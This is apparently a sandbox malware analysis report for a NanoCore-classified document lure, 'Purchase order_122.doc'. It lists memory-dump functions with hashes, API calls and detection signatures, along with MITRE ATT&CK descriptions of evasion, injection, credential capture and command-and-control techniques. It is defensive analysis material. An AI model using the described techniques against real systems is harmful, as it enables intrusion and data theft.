Instruction ID: fb5ba4d725fbbc68f30d276e90d80c9ae3e06f6c8e3b8270ae3471a2949d90aa
Opcode Fuzzy Hash: 2736f466e125dfbf3d43203805c6325a8054faf71ebc0aea9f9bed3f01e889c6
Instruction Fuzzy Hash: 77112371400700EFFB21CF55DC84F6AFBA8EF04320F04C5AAEA499A541D234E944CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 0036A2A3, Relevance: 1.6, APIs: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0036A2FC

Memory Dump Source

Source File: 00000011.00000002.486015924.000000000036A000.00000040.00000001.sdmp, Offset: 0036A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: 77e0b3b86b29626fce1e724cef0e037f137eafbf17c9b45538273c2879c44c92
Instruction ID: 951612785ab3c20bf872c585156dfc70ca7ac40009104b8892e73e13bbdccbf6
Opcode Fuzzy Hash: 77e0b3b86b29626fce1e724cef0e037f137eafbf17c9b45538273c2879c44c92
Instruction Fuzzy Hash: E51102755097C09FD7128B25DC84B52FFB4EF02220F09C0DBED858B263C234A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0036A2CA, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON

Download Yara Rule

APIs

UnmapViewOfFile.KERNELBASE(?), ref: 0036A2FC

Memory Dump Source

Source File: 00000011.00000002.486015924.000000000036A000.00000040.00000001.sdmp, Offset: 0036A000, based on PE: false

Similarity

API ID: FileUnmapView
String ID:
API String ID: 2564024751-0
Opcode ID: c321f690fce6c62faf61ddc7601b69e01ee71fa86e684ac0c556839bbb330b65
Instruction ID: 7bd2ef3228588174323cbabdc154b53c1428ad779f5e1e21a45135c66aa7fe83
Opcode Fuzzy Hash: c321f690fce6c62faf61ddc7601b69e01ee71fa86e684ac0c556839bbb330b65
Instruction Fuzzy Hash: 0501F435600740CFEB118F19E889766FB94EF00320F18C0AADD099B756D275E954DF62

Uniqueness

Uniqueness Score: -1.00%

Function 0036A23A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0036A269

Memory Dump Source

Source File: 00000011.00000002.486015924.000000000036A000.00000040.00000001.sdmp, Offset: 0036A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 677bb624921f644575cd962ba460ec44292d160548aa551e514cf376cf49f6af
Instruction ID: a438a2db1aacdf9956812b32a6009a56e3f67ca2cc41ad9d9b55f57dbc1d1932
Opcode Fuzzy Hash: 677bb624921f644575cd962ba460ec44292d160548aa551e514cf376cf49f6af
Instruction Fuzzy Hash: D2F0C234944740CFEB11CF05D889761FBA4EB00720F08C4EADD0D4B616D276A944CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 004F06B9, Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

D9Vq, xrefs: 004F0796

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: dcd4a7ea47f2c8b2356f8963120aa00ebb648ea8d3ff87ea19bcfa2d71e7c427
Instruction ID: 7d8920e7dece2b7bf74f3f955dc813f7c02aa2dafb2d68a106635492d874a0d4
Opcode Fuzzy Hash: dcd4a7ea47f2c8b2356f8963120aa00ebb648ea8d3ff87ea19bcfa2d71e7c427
Instruction Fuzzy Hash: 063150343052528FCB1E6B74C42866D36E2AFC5301B1544BED406CF7A6DE3ACC46C781

Uniqueness

Uniqueness Score: -1.00%

Function 004F06C8, Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

D9Vq, xrefs: 004F0796

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID: D9Vq
API String ID: 0-3580589329
Opcode ID: 7d355fa740d6cbfb77f5bd31e37e43163069bf9cf49beb96a275f71256671ffe
Instruction ID: 66c162caccdbb7c5652e017bbda52d6f731338c43abba1568aa4086882126d4c
Opcode Fuzzy Hash: 7d355fa740d6cbfb77f5bd31e37e43163069bf9cf49beb96a275f71256671ffe
Instruction Fuzzy Hash: 95212B343012128FDB5D6B78C028B6E36E2AFD5711B1544BDD40ACF7A6EE3ADC429B81

Uniqueness

Uniqueness Score: -1.00%

Function 0036A336, Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0036A39C

Memory Dump Source

Source File: 00000011.00000002.486015924.000000000036A000.00000040.00000001.sdmp, Offset: 0036A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d56f6dfc3caa66896d14bbd9b9f7b3dda802abcb9372f9091bd323dd6052ddac
Instruction ID: 2ffa5ae5370cc2e62b7424a629b1f58265931391c8a56745eb15d6d83cce02bd
Opcode Fuzzy Hash: d56f6dfc3caa66896d14bbd9b9f7b3dda802abcb9372f9091bd323dd6052ddac
Instruction Fuzzy Hash: DC21A2755093C09FD7128B24DC45752BFB4EF02220F0984EBDD85CF263C278A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0036A36A, Relevance: 1.3, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?), ref: 0036A39C

Memory Dump Source

Source File: 00000011.00000002.486015924.000000000036A000.00000040.00000001.sdmp, Offset: 0036A000, based on PE: false

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d9fafda767c6ad50b13d4c275e39d6322093f1172a23e1c6fa9f09ad10fdaf30
Instruction ID: 63b2d5d509b4d4ea1269e77da187da442e749fbad04e8f57257aeab4bcaca30c
Opcode Fuzzy Hash: d9fafda767c6ad50b13d4c275e39d6322093f1172a23e1c6fa9f09ad10fdaf30
Instruction Fuzzy Hash: 9C01DF79605740CFEB218F19D88876AFBA4EB00320F18C0AADC098B706D274E944DF62

Uniqueness

Uniqueness Score: -1.00%

Function 002807F9, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.485985000.0000000000280000.00000040.00000040.sdmp, Offset: 00280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ded52c3daa47767c4c9381d2471fdb264edf7ee1c1f561bb4ce04320ba43a62a
Instruction ID: 99869b80e19d248e5917d79e7856694dae0619d2fe750b6b7736c8b271986b98
Opcode Fuzzy Hash: ded52c3daa47767c4c9381d2471fdb264edf7ee1c1f561bb4ce04320ba43a62a
Instruction Fuzzy Hash: CB0186765497905FD7118F05AC40862FFA8EE8663070DC1AFED4D8B612D229B905CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 004F0EC8, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df050984c7b7cdf04a1e1e22078afdb477656f68f20aacf974e45447ea2770a
Instruction ID: 854ec097203a96cb4394109e20aa7e02e5d3ffe46abd307cc4b33ac2d0a881ca
Opcode Fuzzy Hash: 7df050984c7b7cdf04a1e1e22078afdb477656f68f20aacf974e45447ea2770a
Instruction Fuzzy Hash: EFF055307010519FCB00EB3CE8489A93BE2AF9921030646BBD809DB366DA709C09CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0028081E, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.485985000.0000000000280000.00000040.00000040.sdmp, Offset: 00280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fc55b5a398e7a5faa4d10d11d7caf78d0130cb1ecb52448c3686c2cf47f85b6
Instruction ID: 1917c259318d15c07bdcd5a73b324ced7f5d7311caa533624d60d2f8ba1a468a
Opcode Fuzzy Hash: 8fc55b5a398e7a5faa4d10d11d7caf78d0130cb1ecb52448c3686c2cf47f85b6
Instruction Fuzzy Hash: 8FE092B66017008BD750CF0AFC81452F794EB84A30B08C17FDC0D8B710E136B605CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 004F039B, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdb35dfe63afb2a974f9a5d730bd3b275aee11bb049fcc51f2e0481b24fd1383
Instruction ID: 86a061153d2258d9568d9bcd4170e717609aa1ddd0d3b04f1e1bcb9706819993
Opcode Fuzzy Hash: cdb35dfe63afb2a974f9a5d730bd3b275aee11bb049fcc51f2e0481b24fd1383
Instruction Fuzzy Hash: 0EF03034A05219CFEB159B70C51C7BD7BF1AF88304F200459C106EB2A1CB784D85CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004F0ED8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b683f5e96bba7f3bc5ab04d6a1b52b002faea3359ec4e7693fb72ebe6a515fe0
Instruction ID: 21b84dd2432a0548a7988e3526d930a22e50157a5b7db2e6a7a79be9673d21f7
Opcode Fuzzy Hash: b683f5e96bba7f3bc5ab04d6a1b52b002faea3359ec4e7693fb72ebe6a515fe0
Instruction Fuzzy Hash: 57E04F303001259FCB54FB7CE44895A33EAEB9926571245BBE509EB329DEB0AC44CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 004F00A8, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4021009525b18953417a2f86de2c052edddf48faa9cfac29aa8e049512b5a9ce
Instruction ID: 801d9122de3bd377d6af16f75ebdeecd60d404b6f47ced248cdd217fb8d683e2
Opcode Fuzzy Hash: 4021009525b18953417a2f86de2c052edddf48faa9cfac29aa8e049512b5a9ce
Instruction Fuzzy Hash: 4CE07571D0121D9F8F50EFB999455DEBFF8EA48250F600466D609E3201E63556118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004F0D60, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486221776.00000000004F0000.00000040.00000001.sdmp, Offset: 004F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2537565949215b1b42e3a18e9e320f8b16d56e831b68f5705f67ca184aeda204
Instruction ID: 8ac382f66586e0e7534622a2ce2a33e21706a8ab202c810f83c5b12578dce768
Opcode Fuzzy Hash: 2537565949215b1b42e3a18e9e320f8b16d56e831b68f5705f67ca184aeda204
Instruction Fuzzy Hash: 14D02E302097819FC3069BA8A09055ABBE5BA81220311816FC80A83A11CBA05C00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 003623F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486010126.0000000000362000.00000040.00000001.sdmp, Offset: 00362000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0442f72faa64eefe0abda1300594148a2a368dd725758534e19b20d1146ba78e
Instruction ID: 0799483be1b57591bbb9efc5732b07366c8d6f5f4e903aa9a3822bfbb4f30b74
Opcode Fuzzy Hash: 0442f72faa64eefe0abda1300594148a2a368dd725758534e19b20d1146ba78e
Instruction Fuzzy Hash: DAD05E79204A818FD3178B1DC1A8BA63BD4AF51B04F4784F9A800CB6A7CB68D981D200

Uniqueness

Uniqueness Score: -1.00%

Function 003623BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.486010126.0000000000362000.00000040.00000001.sdmp, Offset: 00362000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20eb84dc331c9a02f82f2d2bb581d22b6278cc1a97284f6140fc7cae05fcea43
Instruction ID: 96a39988bdd293cd6e11cc7fddd109076af578de017c44f6236cb7a8535dab82
Opcode Fuzzy Hash: 20eb84dc331c9a02f82f2d2bb581d22b6278cc1a97284f6140fc7cae05fcea43
Instruction Fuzzy Hash: E3D09E78340A818BD71ADB1CD694F5A77E4AB40704F1784E9AC508B76AC7B8DD81D640

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Purchase order_122.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NanoCore

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

AV Detection:

Exploits:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Exploits:

Compliance:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre